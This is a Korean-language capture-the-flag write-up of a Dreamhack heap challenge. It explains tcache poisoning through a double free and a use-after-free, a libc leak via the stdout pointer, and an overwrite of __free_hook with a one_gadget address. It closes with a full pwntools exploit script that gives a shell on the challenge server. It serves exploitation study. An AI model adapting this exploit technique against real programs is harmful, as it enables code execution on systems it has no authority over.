Tcache Poisoning

위 내용은 필수로 숙지를 해야지만 이 문제를 이해할 수 있으며,
설계 및 기본이 됩답니다.

---

Tcache Poisoning

문제 풀이

Full RELRO와 NX가 걸려있는 모습입니다.
즉, hook overwrite 공격을 고려할 법 하군요

Tcache Poisoning을 활용으로 tcache를 조작해 임의 주소에 청크를 할당시키는 공격 기법입니다.
중복시킨 방법으로 앞에서 사용한 달링포인터도 위 방식의 활용이라고 할 수 있습니다.따라서 공격자는 중복으로 연결된(FIFO 형식의 더블 연결 리스트형식..그래서 공부하라고 했을까요?)
frist /bin 등이 위와 같은 형식의 청크가 위와 같은 형식이라고 할 수 있습니다.따라서 중복으로 연결된 청크를 재할당 시, 그 청크는 할당된 청크이면서 동시에 해제된 청크라고 할 수 있습니다.

위와 같은 이미지가 직관적으로 설명한 모습 전반적인 설명은 시간 관계상 패스할께요
따라서 공격자가 중첩 상태인 청크에 임의값을 쓴다면, 그 청크의 fd와 bk를 조작 즉, exploit 가능이죠저희는 ptmalloc2는 동적 할당 요청에 대해 free list의 청크를 먼저 반환하므로 이를 활용 임의 주소로 RCE!예제를 보시면 청크를 임의 크기로 할당 및 해제가 가능합니다.

특히 case 2부분은 청크 해제 후 chunk 포인터를 초기화 X 즉 다시 해제가 가능합니다
Double free 취약점이 존재한다고 할 수 있습니다. 또한
chunk 포인터 초기화를 안 했기에 해제된 청크 데이터는 case 4조작이 가능하겠죠

또 보면 custom_func 함수는 0x100이상의 크기가 힙 청크를 할당 해제할 수 있습니다
마찬가지로 초기화를 안해서 UAF가 발생하겠군요

---

Exploit 설계

임의 주소 일기 및 쓰기를 위해 Tcache Poisioning을 활용하기 위해 관련 보호기법이 없으므로
적당한 크기의 청크를 할당하고, key를 조작한 뒤(byte 조작), 다시 해제 하면 가능합니다.

그 상태에서 다시 청크를 할당하고 원하는 주소를 값으로 쓰면 tcache에 임의 주소를 추가할 수 있습니다.

예제를 다시 봐보면 setvbuf 함수 인자로 stdin과 stdout을 전달하는데, 이 포인터 변수들은 각각
libc 내부의 함수로써 정확한 함수의 명칭을 모르겠다면 아래처럼 확인하는 방식도 있습니다

이 중 한 변수의 값을 읽으면, 그 값을 활용하여 libc의 주소를 계산 가능!
이 포인터들은 전역 변수로서 bss에 위치하는데, PIE가 적용 X

고로 포인터들의 주소가 고정되어 있습니다. 이를 활용하여 값을 읽을 수 있습니다.

마지막으로 libc의 매핑 주소를 구했다면 그로부터 one_gadget의 주소와 __free_hook의 주소를 계산 후
넣는다면 셸 획득을 할 수 있습니다.

---

Exploit

그럼 이제 어떤 방식으로 Tcache Poisoning으로 0x4141..을 tcache에 추가하여
그 상태에서 0x30크기의 청크를 두 번 할당해서 공격이 된는지 확인해봅시다

위와 같이 나온 것을 보면 강제로 SIGSEGV로 강제 종료한 것을 미루어 보았을 땐
공격이 통한다는 점을 알 수 있습니다.

또한 leak을 구하므로써 one-gadget과 __free_hook의 주소를 확인하는 방식도 이전부터
계속 했기에 코드로 보여주고 넘어가겠습니다

여기서 핵심은 아무래도 alloc에서 있는 부분이며, Dreamhack에서 주석에 달아준 내용을 해석하자면
아까 free를 두번하여 UAF의 취약점을 살렸으며, tcache의 주소의 크기와 해당 부분을 임의의 크기로
적당하게 채운 모습입니다.

특히 왜 stdout 부분에 /x60을 넣으냐 호기심이 생길 수 있는데 stdout의 주소의 마지막이 \x60으로
끝나므로 여기서 청크를 할당할 때 데이터도 같이 넣으면서 할당해야하므로 저런 식으로 하며

여기서 stdout주소에 생성한 청크의 데이터 부분 위치에는 _IO_2_1_stdout_의 값이 있기에
\x60이 아닌 다른 값을 넣어주면 값이 바뀌게 되어 문제가 발생할 수 있는 어려운 부분이였습니다.

그리고 나머지 부분은 차래대로 입력하면 됩니다.
앞서 계산한 __free_hook의 주소에 Tcache Poisoning으로 청크를 할당하고, one_gadget의 주소로
주의점은 앞서 오염시킨 tcache[0x40]을 제사용 X 기존의 갑싱 바뀌면서 문제가 발생할 수 있기 때문이죠

stdout에 청크를 할당 시 stdout의 fd는 _IO_2_1_stdout_이기 때문이죠 fd와 bk의 차이도 이해해야겠죠
따라서 이 상태에서 0x30의 크기로 다시 할당을 요청 시 _IO..에 청크가 할당됩니다.
해서 해당 구조체는 표준 출력과 관련된 중요 역할이기에 변조 불가라는 점

이러한 경우엔 다른 크기의 tcache를 대상으로 공격을 시도하는 것이 좋습니다.
그러기에 __free_hook을 조작하고, free를 호출하는 hook overwrite가 되었습니다

# Name: tcache_poison.py
#!/usr/bin/python3
 
from pwn import *
#p = process("./tcache_poison")
p = remote('host3.dreamhack.games', 10190)
e = ELF("./tcache_poison")
libc = ELF("./libc-2.27.so")
 
def slog(symbol, addr): return success(symbol + ": " + hex(addr))
 
def alloc(size, data):
    p.sendlineafter("Edit\n", "1")
    p.sendlineafter(":", str(size))
    p.sendafter(":", data)
 
def free():
    p.sendlineafter("Edit\n", "2")
 
def print_chunk():
    p.sendlineafter("Edit\n", "3")
 
def edit(data):
    p.sendlineafter("Edit\n", "4")
    p.sendafter(":", data)
 
# Allocate a chunk of size 0x40
alloc(0x30, "dreamhack")
free()
 
# tcache[0x40]: "dreamhack"
# Bypass the DFB mitigation
edit("A"*8 + "\x00")
free()
 
# tcache[0x40]: "dreamhack" -> "dreamhack"
# Append the address of `stdout` to tcache[0x40]
addr_stdout = e.symbols["stdout"]
alloc(0x30, p64(addr_stdout))
 
# tcache[0x40]: "dreamhack" -> stdout -> _IO_2_1_stdout_ -> ...
# Leak the value of stdout
alloc(0x30, "B"*8)          # "dreamhack"
alloc(0x30, "\x60")         # stdout
 
# Libc leak
print_chunk()
p.recvuntil("Content: ")
stdout = u64(p.recv(6).ljust(8, b"\x00"))
 
lb = stdout - libc.symbols["_IO_2_1_stdout_"]
fh = lb + libc.symbols["__free_hook"]
og = lb + 0x4f432
 
slog("free_hook", fh)
slog("one_gadget", og)
# Overwrite the `__free_hook` with the address of one_gadget
 
alloc(0x40, "dreamhack")
free()
 
edit("C"*8 + "\x00")
free()
 
alloc(0x40, p64(fh))
alloc(0x40, "D"*8)
alloc(0x40, p64(og))
 
# Call `free()` to get shell
free()
p.interactive()
 

---

참고 자료

Exploit Tech: Use After Free 강의 설명이 너무 빈약한 것 같습니다..ㅠㅠ

 

참고 이미지